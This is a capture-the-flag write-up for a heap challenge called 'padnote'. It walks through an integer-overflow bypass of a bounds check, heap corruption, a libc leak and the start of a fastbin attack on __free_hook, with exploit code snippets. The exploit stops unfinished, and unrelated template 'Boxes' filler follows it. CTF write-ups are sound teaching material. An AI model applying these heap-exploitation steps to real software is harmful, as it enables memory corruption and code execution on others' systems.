I";I<h2 id="introduction">Introduction</h2>
<blockquote>
  <p>I proudly released the world most secure note after aggressively tested the source code with AFL and CodeQL, and didn’t find any bugs.</p>
</blockquote>

<p>You can download the challenge archive from <a href="https://github.com/linz04/PWN-Writeup/blob/international/BsidesAhmed/padnote/padnote.tar.gz?raw=true">here</a></p>

<h2 id="the-bug">The Bug</h2>
<p>Lets look the source code, the bug is in <strong>EditNote</strong> function</p>

<figure class="highlight"><pre><code class="language-c" data-lang="c"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
</pre></td><td class="code"><pre><span class="kt">void</span> <span class="nf">EditNote</span><span class="p">(</span><span class="n">Note</span> <span class="o">*</span><span class="n">note</span><span class="p">)</span> <span class="p">{</span>
  <span class="kt">int</span> <span class="n">offset</span><span class="p">,</span> <span class="n">count</span><span class="p">,</span> <span class="n">epos</span><span class="p">;</span>

  <span class="cm">/* Check if note is empty */</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">note</span><span class="o">-&gt;</span><span class="n">content</span><span class="p">)</span>
    <span class="n">CHECK_FAIL</span><span class="p">(</span><span class="s">"Note is empty"</span><span class="p">);</span>

  <span class="cm">/* Input offset */</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Offset: "</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">scanf</span><span class="p">(</span><span class="s">"%d%*c"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">offset</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="c1">// IO error</span>

  <span class="cm">/* Input count */</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Count: "</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">scanf</span><span class="p">(</span><span class="s">"%d%*c"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">count</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="c1">// IO error</span>

  <span class="cm">/* Security check */</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">offset</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
    <span class="n">CHECK_FAIL</span><span class="p">(</span><span class="s">"Invalid offset"</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">count</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="n">CHECK_FAIL</span><span class="p">(</span><span class="s">"Invalid count"</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">((</span><span class="n">epos</span> <span class="o">=</span> <span class="n">offset</span> <span class="o">+</span> <span class="n">count</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
    <span class="n">CHECK_FAIL</span><span class="p">(</span><span class="s">"Integer overflow"</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">epos</span> <span class="o">&gt;</span> <span class="n">note</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">)</span>
    <span class="n">CHECK_FAIL</span><span class="p">(</span><span class="s">"Out-of-bound access"</span><span class="p">);</span>
  
  <span class="cm">/* Edit content */</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Content: "</span><span class="p">);</span>
  <span class="n">ReadLine</span><span class="p">(</span><span class="o">&amp;</span><span class="n">note</span><span class="o">-&gt;</span><span class="n">content</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="n">count</span><span class="p">);</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p><br />
Variable offset, count and epos using integer. So we can trigger <strong>Integer overflow</strong> here.
But how?<br />
Value of INT_MAX is +2147483647.<br />
Value of INT_MIN is -2147483648.<br />
What if we input INT_MAX+1 or INT_MIN-1? What will happen? Here i wrote example program
<img src="/assets/images/padnote/padnote.png" alt="Example" />
We can see if we input INT_MAX+1 it will convert to INT_MIN and if we input INT_MIN-1 it will convert to INT_MAX
So with this we can bypass the security check by input INT_MIN+x to count, since int is 32bit then we can also by pass
<code class="language-plaintext highlighter-rouge">(epos = offset + count) &lt; 0</code> lets try this.<br /></p>

<h2 id="solution">Solution</h2>
<h3 id="trigger-bug">Trigger Bug</h3>
<p>First we create note with any size</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">add</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="sa">b</span><span class="s">'Linz'</span><span class="p">)</span>
</code></pre></div></div>
<p>Check the heap on gdb.
<img src="/assets/images/padnote/padnote2.png" alt="Padnote2" />
Next we try edit with offset is the size and count INT_MIN-1.
<img src="/assets/images/padnote/padnote3.png" alt="Padnote3" />
We can see we get no error from our input. Next we see the heap on gdb to check the result.
<img src="/assets/images/padnote/padnote4.png" alt="Padnote4" />
Nice we successfully overwrite the top chunk with integer overflow.<br />
Next step is we need to leak libc.</p>

<h3 id="leak-libc">Leak LIBC</h3>
<p>This part a bit challenging because when ce create note, it use <code class="language-plaintext highlighter-rouge">calloc</code> instead of <code class="language-plaintext highlighter-rouge">malloc</code>.<br />
Also we only can malloc with 4 index.</p>

<figure class="highlight"><pre><code class="language-c" data-lang="c"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
</pre></td><td class="code"><pre><span class="kt">void</span> <span class="nf">CreateNote</span><span class="p">(</span><span class="n">Note</span> <span class="o">*</span><span class="n">note</span><span class="p">)</span> <span class="p">{</span>
  <span class="kt">int</span> <span class="n">size</span><span class="p">;</span>
  <span class="kt">char</span> <span class="o">*</span><span class="n">content</span><span class="p">;</span>

  <span class="cm">/* Check if note is empty */</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">note</span><span class="o">-&gt;</span><span class="n">content</span><span class="p">)</span>
    <span class="n">CHECK_FAIL</span><span class="p">(</span><span class="s">"Note is in use"</span><span class="p">);</span>

  <span class="cm">/* Input data length */</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Size: "</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">scanf</span><span class="p">(</span><span class="s">"%d%*c"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">size</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="c1">// IO error</span>

  <span class="cm">/* Security check */</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">size</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="n">CHECK_FAIL</span><span class="p">(</span><span class="s">"Size must be larger than 0"</span><span class="p">);</span>

  <span class="cm">/* Initialize note */</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">content</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">calloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">char</span><span class="p">),</span> <span class="n">size</span><span class="p">)))</span>
    <span class="n">CHECK_FAIL</span><span class="p">(</span><span class="s">"Could not allocate the memory"</span><span class="p">);</span>

  <span class="cm">/* Input content */</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Content: "</span><span class="p">);</span>
  <span class="n">ReadLine</span><span class="p">(</span><span class="n">content</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>

  <span class="n">note</span><span class="o">-&gt;</span><span class="n">content</span> <span class="o">=</span> <span class="n">content</span><span class="p">;</span>
  <span class="n">note</span><span class="o">-&gt;</span><span class="n">size</span> <span class="o">=</span> <span class="n">size</span><span class="p">;</span>
  <span class="p">...</span>
      <span class="k">if</span> <span class="err">\</span><span class="p">(</span><span class="n">index</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="err">\</span><span class="o">||</span> <span class="n">index</span> <span class="o">&gt;=</span> <span class="n">MAX</span><span class="err">\</span><span class="n">_NOTE</span><span class="p">)</span> <span class="p">{</span>
      <span class="n">puts</span><span class="p">(</span><span class="s">"Invalid index"</span><span class="p">);</span>
      <span class="k">continue</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">...</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>The different between calloc and malloc that i know calloc doesnt reuse <strong>tcache</strong>. So it is a bit tricky to leak libc.<br />
Here how we can leak libc.</p>
<ol>
  <li>Create 7 notes to fill tcache and delete it.
    <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">7</span><span class="p">):</span>
 <span class="n">add</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x60</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span>
 <span class="n">delete</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</code></pre></div>    </div>
  </li>
  <li>Now Create 2 notes for initial overwrite
    <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">add</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="sa">b</span><span class="s">'0'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span>
<span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x30</span> <span class="p">,</span><span class="sa">b</span><span class="s">'1'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span>
</code></pre></div>    </div>
  </li>
  <li>Create big size malloc to get unsorted bin
    <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">add</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mh">0x440</span><span class="p">,</span> <span class="sa">b</span><span class="s">"2"</span><span class="o">*</span><span class="mi">8</span><span class="p">))</span> <span class="c1">#Unsorted bin
</span><span class="n">add</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="sa">b</span><span class="s">'3'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span> <span class="c1">#Small chunk
</span></code></pre></div>    </div>
    <p>Here how it looks like
<img src="/assets/images/padnote/padnote5.png" alt="Padnote5" /></p>
  </li>
  <li>Overwrite index 1 size, to 0x491 then we free index 1.
    <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">edit</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="o">-</span><span class="mh">0x80000001</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="o">*</span><span class="mi">8</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x491</span><span class="p">))</span>
<span class="n">delete</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</code></pre></div>    </div>
    <p><img src="/assets/images/padnote/padnote6.png" alt="Padnote6" /></p>
  </li>
  <li>Create 1 note again, with this we can leak libc on index 2
    <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="sa">b</span><span class="s">'1'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span>
</code></pre></div>    </div>
    <p><img src="/assets/images/padnote/padnote7.png" alt="Padnote7" /></p>
  </li>
  <li>Print note 2 to get libc leak
    <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">view</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Content: '</span><span class="p">)</span>
<span class="n">leak</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvn</span><span class="p">(</span><span class="mi">6</span><span class="p">)</span><span class="o">+</span><span class="sa">b</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="o">*</span><span class="mi">2</span><span class="p">)</span>
<span class="n">libc</span><span class="p">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">leak</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="s">'__malloc_hook'</span><span class="p">]</span> <span class="o">&amp;</span> <span class="o">~</span><span class="mh">0xfff</span>
<span class="k">print</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc</span><span class="p">.</span><span class="n">address</span><span class="p">))</span>
</code></pre></div>    </div>
    <p><img src="/assets/images/padnote/padnote8.png" alt="Padnote8" /></p>
  </li>
</ol>

<h3 id="gain-shell">Gain Shell</h3>
<p>We already get libc leak, for gaining the shell, we just use fastbin attack, i will not explain detail about fastbin attack here, you can read
some article about that <a href="https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html">here</a>.<br /></p>

<ol>
  <li>We clear notes index first, next create notes to prepare fastbin attack, since we already full tcache for size 0x60, so we create notes with size 0x60
because when we free it, it will move to fastbin.
    <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">add</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x60</span><span class="p">,</span> <span class="sa">b</span><span class="s">'0'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span>
<span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x60</span><span class="p">,</span> <span class="sa">b</span><span class="s">'1'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span>
<span class="n">add</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mh">0x60</span><span class="p">,</span> <span class="sa">b</span><span class="s">'3'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span>
<span class="c1"># delete 1 &amp; 3 it will  ove to fastbin
</span><span class="n">delete</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span>
<span class="n">delete</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</code></pre></div>    </div>
  </li>
  <li>Edit note index 0 to overwrite fastbin index 1, here i overwrite fastbin to __free_hook-xxxxx since we can overwrite __free_hook with overflow later.</li>
</ol>

<h2 id="boxes">Boxes</h2>
<p>You can add notification, warning and error boxes like this:</p>

<h3 id="notification">Notification</h3>

<p class="box-note"><strong>Note:</strong> This is a notification box.</p>

<h3 id="warning">Warning</h3>

<p class="box-warning"><strong>Warning:</strong> This is a warning box.</p>

<h3 id="error">Error</h3>

<p class="box-error"><strong>Error:</strong> This is an error box.</p>
:ET